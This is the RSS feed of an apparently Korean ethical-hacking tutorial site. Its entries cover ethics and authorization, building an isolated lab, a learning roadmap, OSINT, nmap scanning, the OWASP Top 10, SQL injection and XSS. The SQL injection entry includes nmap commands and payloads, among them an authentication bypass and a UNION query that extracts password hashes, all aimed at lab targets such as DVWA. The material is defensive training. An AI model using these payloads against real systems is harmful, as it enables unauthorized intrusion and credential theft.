<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>White Hacker Academy</title><link>https://whacker.metacog.co.kr/</link><description>Recent content on White Hacker Academy</description><generator>Hugo</generator><language>ko-kr</language><lastBuildDate>Sun, 23 Aug 2026 21:41:35 -0500</lastBuildDate><atom:link href="https://whacker.metacog.co.kr/index.xml" rel="self" type="application/rss+xml"/><item><title>윤리와 법률</title><link>https://whacker.metacog.co.kr/docs/getting-started/ethics-legal/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/getting-started/ethics-legal/</guid><description>&lt;p&gt;화이트해커(윤리적 해커)와 공격자를 가르는 것은 **기술이 아니라 허가(authorization)**다.
같은 도구, 같은 명령어라도 서면 허가 유무에 따라 하나는 직업이고 다른 하나는 범죄다.&lt;/p&gt;
&lt;h2 id="core-principles"&gt;절대 원칙 &lt;a href="#core-principles" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;명시적 서면 허가 없이는 아무것도 건드리지 않는다.&lt;/strong&gt; 구두 허가, &amp;ldquo;괜찮을 거야&amp;quot;는 허가가 아니다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;범위(scope)를 벗어나지 않는다.&lt;/strong&gt; 허가받은 IP·도메인·계정 밖은 존재하지 않는 것처럼 취급한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;피해를 최소화한다.&lt;/strong&gt; 서비스 중단, 데이터 파괴, 실 사용자 영향이 예상되면 멈추고 보고한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;발견한 취약점은 책임 있게 공개한다.&lt;/strong&gt; 악용·판매·과시하지 않는다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;알게 된 데이터는 비밀로 유지한다.&lt;/strong&gt; 고객 데이터는 테스트가 끝나면 안전하게 파기한다.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="roe"&gt;참여 규칙(Rules of Engagement) &lt;a href="#roe" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;모든 정식 침투 테스트는 시작 전에 &lt;strong&gt;RoE 문서&lt;/strong&gt;로 범위를 못박는다.&lt;/p&gt;</description></item><item><title>실습 랩 구축</title><link>https://whacker.metacog.co.kr/docs/getting-started/build-a-lab/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/getting-started/build-a-lab/</guid><description>&lt;p&gt;허가 없는 시스템 대신, &lt;strong&gt;격리된 가상 랩&lt;/strong&gt;에서 무제한으로 연습한다. 핵심은
공격 머신과 취약 대상을 &lt;strong&gt;인터넷·집 네트워크와 분리된 가상 네트워크&lt;/strong&gt;에 두는 것이다.&lt;/p&gt;
&lt;h2 id="minimal-setup"&gt;최소 구성 &lt;a href="#minimal-setup" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 subgraph Host[호스트 PC - VirtualBox/VMware/UTM]
 subgraph Net[Host-Only / Internal Network]
 K[Kali Linux&amp;lt;br/&amp;gt;공격 머신]
 V1[취약 대상&amp;lt;br/&amp;gt;Metasploitable2]
 V2[취약 대상&amp;lt;br/&amp;gt;DVWA / Juice Shop]
 W[Windows AD Lab&amp;lt;br/&amp;gt;선택]
 end
 end
 K -.공격.-&amp;gt; V1
 K -.공격.-&amp;gt; V2
 K -.공격.-&amp;gt; W
&lt;/pre&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;구성요소&lt;/th&gt;
 &lt;th&gt;추천&lt;/th&gt;
 &lt;th&gt;용도&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;하이퍼바이저&lt;/td&gt;
 &lt;td&gt;VirtualBox(무료), VMware, UTM(Apple Silicon)&lt;/td&gt;
 &lt;td&gt;가상머신 실행&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;공격 머신&lt;/td&gt;
 &lt;td&gt;&lt;strong&gt;Kali Linux&lt;/strong&gt; 또는 Parrot OS&lt;/td&gt;
 &lt;td&gt;도구 모음 사전 탑재&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;취약 리눅스&lt;/td&gt;
 &lt;td&gt;Metasploitable2, VulnHub 이미지&lt;/td&gt;
 &lt;td&gt;네트워크·서비스 공격&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;취약 웹앱&lt;/td&gt;
 &lt;td&gt;DVWA, OWASP Juice Shop, WebGoat&lt;/td&gt;
 &lt;td&gt;웹 취약점&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;AD 실습&lt;/td&gt;
 &lt;td&gt;Windows Server + 클라이언트, &lt;a href="https://github.com/Orange-Cyberdefense/GOAD" rel="external" target="_blank"&gt;GOAD&lt;svg width="16" height="16" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"&gt;&lt;path fill="currentColor" d="M14 5c-.552 0-1-.448-1-1s.448-1 1-1h6c.552 0 1 .448 1 1v6c0 .552-.448 1-1 1s-1-.448-1-1v-3.586l-7.293 7.293c-.391.39-1.024.39-1.414 0-.391-.391-.391-1.024 0-1.414l7.293-7.293h-3.586zm-9 2c-.552 0-1 .448-1 1v11c0 .552.448 1 1 1h11c.552 0 1-.448 1-1v-4.563c0-.552.448-1 1-1s1 .448 1 1v4.563c0 1.657-1.343 3-3 3h-11c-1.657 0-3-1.343-3-3v-11c0-1.657 1.343-3 3-3h4.563c.552 0 1 .448 1 1s-.448 1-1 1h-4.563z"/&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;도메인·측면이동&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="isolation"&gt;격리가 왜 중요한가 &lt;a href="#isolation" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;NAT/Bridged 금지, Host-Only 또는 Internal 사용&lt;/strong&gt; — 취약 VM이 실수로 인터넷에 노출되면
실제 봇넷에 감염될 수 있고, 스캔이 집 밖으로 새어나가면 법적 문제가 된다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;스냅샷&lt;/strong&gt;을 적극 활용한다. 익스플로잇 전 스냅샷 → 실패하면 롤백.&lt;/li&gt;
&lt;li&gt;취약 VM에는 개인 데이터·자격증명을 절대 두지 않는다.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cloud"&gt;클라우드 대안 &lt;a href="#cloud" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;로컬 리소스가 부족하면 &lt;strong&gt;TryHackMe / Hack The Box&lt;/strong&gt;의 브라우저 기반 랩을
쓴다. 이미 격리·인가된 환경이므로 별도 설정 없이 바로 연습할 수 있다.&lt;/p&gt;</description></item><item><title>학습 로드맵</title><link>https://whacker.metacog.co.kr/docs/getting-started/learning-roadmap/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/getting-started/learning-roadmap/</guid><description>&lt;p&gt;화이트해커 역량은 한 번에 완성되지 않는다. &lt;strong&gt;기반기술 → 공격기술 → 실전운영&lt;/strong&gt;
순으로 쌓는다. 각 단계는 앞 단계를 전제로 한다.&lt;/p&gt;
&lt;h2 id="stages"&gt;성장 단계 &lt;a href="#stages" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart TD
 F[0. 기반&amp;lt;br/&amp;gt;리눅스·네트워크·프로그래밍] --&amp;gt; R[1. 정찰&amp;lt;br/&amp;gt;OSINT·스캐닝]
 R --&amp;gt; W[2. 취약점 공격&amp;lt;br/&amp;gt;웹·네트워크·시스템]
 W --&amp;gt; P[3. 포스트 익스플로잇&amp;lt;br/&amp;gt;권한상승·측면이동]
 P --&amp;gt; O[4. 레드팀 운영&amp;lt;br/&amp;gt;ATT&amp;amp;CK·C2·보고]
 O --&amp;gt; S[5. 전문화&amp;lt;br/&amp;gt;클라우드·모바일·OT/ICS]
&lt;/pre&gt;
&lt;h2 id="checklist"&gt;단계별 체크리스트 &lt;a href="#checklist" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;단계&lt;/th&gt;
 &lt;th&gt;반드시 갖출 것&lt;/th&gt;
 &lt;th&gt;검증 방법&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;0. 기반&lt;/td&gt;
 &lt;td&gt;Linux CLI, TCP/IP, HTTP, Python/Bash 기초&lt;/td&gt;
 &lt;td&gt;스크립트로 간단한 스캐너 작성&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;1. 정찰&lt;/td&gt;
 &lt;td&gt;nmap, OSINT, 서비스 열거&lt;/td&gt;
 &lt;td&gt;THM 초급 방 클리어&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;2. 공격&lt;/td&gt;
 &lt;td&gt;OWASP Top 10, Metasploit, 수동 익스플로잇&lt;/td&gt;
 &lt;td&gt;Juice Shop 전 과제, HTB Easy 박스&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;3. 포스트&lt;/td&gt;
 &lt;td&gt;권한상승(Linux/Windows), 피벗팅&lt;/td&gt;
 &lt;td&gt;HTB Medium 박스&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;4. 운영&lt;/td&gt;
 &lt;td&gt;ATT&amp;amp;CK 매핑, C2 운용, 리포팅&lt;/td&gt;
 &lt;td&gt;랩에서 풀 체인 공격 후 보고서 작성&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;5. 전문화&lt;/td&gt;
 &lt;td&gt;관심 분야 심화(클라우드/모바일/AD)&lt;/td&gt;
 &lt;td&gt;해당 분야 자격증·CTF&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="advice"&gt;조언 &lt;a href="#advice" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;손으로 먼저, 자동화는 나중에.&lt;/strong&gt; Metasploit 원클릭보다 수동 익스플로잇을 먼저 이해한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;막히면 write-up을 읽되, 답을 베끼지 말고 원리를 이해한 뒤 다시 스스로 푼다.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;문서화 습관.&lt;/strong&gt; 처음부터 발견 사항을 기록하면 4단계 보고서 작성이 쉬워진다.&lt;/li&gt;
&lt;li&gt;자격증·진로는 &lt;a href="https://whacker.metacog.co.kr/docs/resources/certifications-career/"&gt;도구 &amp;amp; 커리어&lt;/a&gt; 참고.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;p&gt;🧪 &lt;strong&gt;실습해 보기&lt;/strong&gt;: &lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/labs/'&gt;&lt;p&gt;개요&lt;/p&gt;</description></item><item><title>OSINT / 수동 정찰</title><link>https://whacker.metacog.co.kr/docs/recon/osint/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/recon/osint/</guid><description>&lt;p&gt;OSINT(Open-Source Intelligence)는 &lt;strong&gt;대상 시스템에 직접 접근하지 않고&lt;/strong&gt; 공개
정보만으로 조직의 자산·직원·기술스택을 파악하는 수동 정찰이다. 흔적을 남기지 않는다.&lt;/p&gt;
&lt;h2 id="targets"&gt;무엇을 찾나 &lt;a href="#targets" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;자산 유형&lt;/th&gt;
 &lt;th&gt;출처·도구&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;도메인·서브도메인&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;crt.sh&lt;/code&gt;, Subfinder, Amass, DNSdumpster&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;IP·인프라&lt;/td&gt;
 &lt;td&gt;Shodan, Censys, ASN 조회&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;이메일·직원&lt;/td&gt;
 &lt;td&gt;Hunter.io, LinkedIn, theHarvester&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;코드·비밀 유출&lt;/td&gt;
 &lt;td&gt;GitHub 검색, gitleaks, TruffleHog&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;기술 스택&lt;/td&gt;
 &lt;td&gt;Wappalyzer, BuiltWith, HTTP 헤더&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;유출 자격증명&lt;/td&gt;
 &lt;td&gt;Have I Been Pwned(방어 목적 확인)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="workflow"&gt;워크플로우 &lt;a href="#workflow" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 O[조직명·도메인] --&amp;gt; D[도메인/서브도메인 열거]
 O --&amp;gt; P[직원·이메일 수집]
 D --&amp;gt; I[IP·서비스 매핑&amp;lt;br/&amp;gt;Shodan/Censys]
 P --&amp;gt; C[자격증명 패턴 추정]
 I --&amp;gt; S[공격 표면 목록]
 C --&amp;gt; S
&lt;/pre&gt;
&lt;h2 id="examples"&gt;실습 예시 &lt;a href="#examples" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;서브도메인 열거(본인 소유 도메인 또는 인가 대상만):&lt;/p&gt;</description></item><item><title>스캐닝과 열거</title><link>https://whacker.metacog.co.kr/docs/recon/scanning-enumeration/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/recon/scanning-enumeration/</guid><description>&lt;p&gt;능동 정찰은 대상에 &lt;strong&gt;직접 패킷을 보내&lt;/strong&gt; 살아있는 호스트, 열린 포트, 서비스
버전을 식별한다. 트래픽이 남으므로 &lt;strong&gt;반드시 인가된 범위에서만&lt;/strong&gt; 수행한다.&lt;/p&gt;
&lt;h2 id="nmap"&gt;nmap 핵심 &lt;a href="#nmap" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;


 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="75b83d4" class="language-bash "&gt;
 &lt;code&gt;# 호스트 디스커버리(핑 스윕)
nmap -sn 10.10.10.0/24

# 기본 SYN 스캔 &amp;#43; 서비스/버전 &amp;#43; 기본 스크립트
sudo nmap -sS -sV -sC -O 10.10.10.5

# 전체 포트(느림), 그다음 발견된 포트만 정밀 스캔
sudo nmap -p- --min-rate 2000 10.10.10.5 -oN allports.txt
sudo nmap -sV -sC -p 22,80,443,3306 10.10.10.5&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;옵션&lt;/th&gt;
 &lt;th&gt;의미&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-sS&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;SYN(스텔스) 스캔&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-sV&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;서비스/버전 탐지&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-sC&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;기본 NSE 스크립트&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-p-&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;전체 65535 포트&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-O&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;OS 핑거프린팅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;-oA base&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;모든 포맷으로 결과 저장&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="enum"&gt;열거(Enumeration) &lt;a href="#enum" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;포트를 찾았으면 서비스별로 깊이 판다. 발견된 서비스 → 대응 도구:&lt;/p&gt;</description></item><item><title>OWASP Top 10</title><link>https://whacker.metacog.co.kr/docs/web/owasp-top10/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/web/owasp-top10/</guid><description>&lt;p&gt;OWASP Top 10은 웹 애플리케이션의 가장 심각한 보안 위험을 정리한 사실상의
표준이다(2021년판 기준). 화이트해커의 웹 테스트 체크리스트로 쓴다.&lt;/p&gt;
&lt;h2 id="list"&gt;Top 10 (2021) &lt;a href="#list" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;#&lt;/th&gt;
 &lt;th&gt;범주&lt;/th&gt;
 &lt;th&gt;핵심&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;A01&lt;/td&gt;
 &lt;td&gt;접근 통제 취약(Broken Access Control)&lt;/td&gt;
 &lt;td&gt;권한 밖 리소스 접근(IDOR 등)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A02&lt;/td&gt;
 &lt;td&gt;암호화 실패(Cryptographic Failures)&lt;/td&gt;
 &lt;td&gt;민감정보 평문·약한 암호화&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A03&lt;/td&gt;
 &lt;td&gt;인젝션(Injection)&lt;/td&gt;
 &lt;td&gt;SQLi, 명령어 주입, LDAP 등&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A04&lt;/td&gt;
 &lt;td&gt;안전하지 않은 설계(Insecure Design)&lt;/td&gt;
 &lt;td&gt;설계 단계의 결함&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A05&lt;/td&gt;
 &lt;td&gt;보안 설정 오류(Security Misconfiguration)&lt;/td&gt;
 &lt;td&gt;기본 계정, 노출된 관리 페이지&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A06&lt;/td&gt;
 &lt;td&gt;취약·구식 컴포넌트&lt;/td&gt;
 &lt;td&gt;오래된 라이브러리·CVE&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A07&lt;/td&gt;
 &lt;td&gt;인증·식별 실패&lt;/td&gt;
 &lt;td&gt;약한 인증, 세션 관리&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A08&lt;/td&gt;
 &lt;td&gt;소프트웨어·데이터 무결성 실패&lt;/td&gt;
 &lt;td&gt;검증 없는 역직렬화·업데이트&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A09&lt;/td&gt;
 &lt;td&gt;로깅·모니터링 실패&lt;/td&gt;
 &lt;td&gt;탐지 불가능한 침해&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A10&lt;/td&gt;
 &lt;td&gt;SSRF&lt;/td&gt;
 &lt;td&gt;서버가 공격자 지정 URL로 요청&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="flow"&gt;웹 테스트 흐름 &lt;a href="#flow" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 M[매핑&amp;lt;br/&amp;gt;기능·엔드포인트 파악] --&amp;gt; P[프록시 가로채기&amp;lt;br/&amp;gt;Burp Suite]
 P --&amp;gt; T[입력값별 테스트&amp;lt;br/&amp;gt;인젝션·XSS·권한]
 T --&amp;gt; V[검증·영향 확인]
 V --&amp;gt; R[리포팅]
&lt;/pre&gt;
&lt;h2 id="tools"&gt;필수 도구 &lt;a href="#tools" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Burp Suite&lt;/strong&gt; — HTTP 프록시. 요청 가로채기·변조·리피터·인트루더. 웹 해킹의 중심.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OWASP ZAP&lt;/strong&gt; — 무료 대안.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;브라우저 개발자도구&lt;/strong&gt; — 요청·쿠키·스토리지 확인.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;다음 페이지들에서 A03(인젝션), XSS/CSRF, A07(인증/세션)을 실습한다.&lt;/p&gt;</description></item><item><title>인젝션과 SQL 인젝션</title><link>https://whacker.metacog.co.kr/docs/web/injection-sqli/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/web/injection-sqli/</guid><description>&lt;p&gt;인젝션은 사용자 입력이 검증 없이 인터프리터(SQL, 셸, LDAP 등)로 전달될 때
발생한다. 그중 **SQL 인젝션(SQLi)**이 가장 고전적이고 파괴적이다.&lt;/p&gt;
&lt;h2 id="how"&gt;원리 &lt;a href="#how" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;애플리케이션이 입력을 쿼리 문자열에 그대로 이어붙이면, 공격자는 데이터를
넘어 &lt;strong&gt;쿼리 구조 자체&lt;/strong&gt;를 바꿀 수 있다.&lt;/p&gt;



 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="44e7712" class="language-sql "&gt;
 &lt;code&gt;-- 취약한 코드: &amp;#34;SELECT * FROM users WHERE name=&amp;#39;&amp;#34; &amp;#43; input &amp;#43; &amp;#34;&amp;#39;&amp;#34;
-- 입력: &amp;#39; OR &amp;#39;1&amp;#39;=&amp;#39;1
SELECT * FROM users WHERE name=&amp;#39;&amp;#39; OR &amp;#39;1&amp;#39;=&amp;#39;1&amp;#39; -- 항상 참 → 인증 우회&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;h2 id="types"&gt;유형 &lt;a href="#types" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;유형&lt;/th&gt;
 &lt;th&gt;특징&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;In-band (Union)&lt;/td&gt;
 &lt;td&gt;결과가 화면에 직접 보임. &lt;code&gt;UNION SELECT&lt;/code&gt;로 데이터 추출&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Blind (Boolean)&lt;/td&gt;
 &lt;td&gt;참/거짓에 따라 응답 차이로 한 비트씩 추론&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Blind (Time)&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SLEEP()&lt;/code&gt; 지연 시간으로 참/거짓 판별&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Out-of-band&lt;/td&gt;
 &lt;td&gt;DNS/HTTP 콜백으로 데이터 유출&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="flow"&gt;탐지와 추출 흐름 &lt;a href="#flow" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart TD
 A[입력에 &amp;#39; 삽입] --&amp;gt; B{에러/동작 변화?}
 B --&amp;gt;|아니오| Z[취약하지 않을 가능성]
 B --&amp;gt;|예| C[컬럼 수 파악&amp;lt;br/&amp;gt;ORDER BY / UNION]
 C --&amp;gt; D[DB 정보 추출&amp;lt;br/&amp;gt;버전·테이블·컬럼]
 D --&amp;gt; E[민감 데이터 열람]
&lt;/pre&gt;
&lt;h2 id="manual"&gt;수동 예시 (DVWA) &lt;a href="#manual" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;


 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="f9da40b" class="language-sql "&gt;
 &lt;code&gt;-- 컬럼 수 확인
1&amp;#39; ORDER BY 2-- -
-- 버전·DB명 추출
1&amp;#39; UNION SELECT version(), database()-- -
-- 사용자·해시 추출
1&amp;#39; UNION SELECT user, password FROM users-- -&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;p&gt;자동화는 &lt;strong&gt;sqlmap&lt;/strong&gt;을 쓴다(인가된 대상만):&lt;/p&gt;</description></item><item><title>XSS와 CSRF</title><link>https://whacker.metacog.co.kr/docs/web/xss-csrf/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/web/xss-csrf/</guid><description>&lt;p&gt;XSS와 CSRF는 모두 &lt;strong&gt;피해자의 브라우저&lt;/strong&gt;를 이용한다. 서버가 아니라 사용자를 노린다.&lt;/p&gt;
&lt;h2 id="xss"&gt;XSS (Cross-Site Scripting) &lt;a href="#xss" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;공격자의 스크립트가 다른 사용자의 브라우저에서 실행된다. 세션 탈취, 키로깅,
피싱 폼 삽입이 가능하다.&lt;/p&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;유형&lt;/th&gt;
 &lt;th&gt;설명&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Reflected&lt;/td&gt;
 &lt;td&gt;URL 파라미터가 즉시 응답에 반사됨. 링크 클릭 유도&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Stored&lt;/td&gt;
 &lt;td&gt;DB에 저장되어 방문자마다 실행(게시판, 댓글) — 가장 위험&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DOM-based&lt;/td&gt;
 &lt;td&gt;클라이언트 JS가 입력을 안전하지 않게 DOM에 반영&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;



 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="52c8542" class="language-html "&gt;
 &lt;code&gt;&amp;lt;!-- 저장형 XSS 페이로드 예시 (인가된 실습 앱에서만) --&amp;gt;
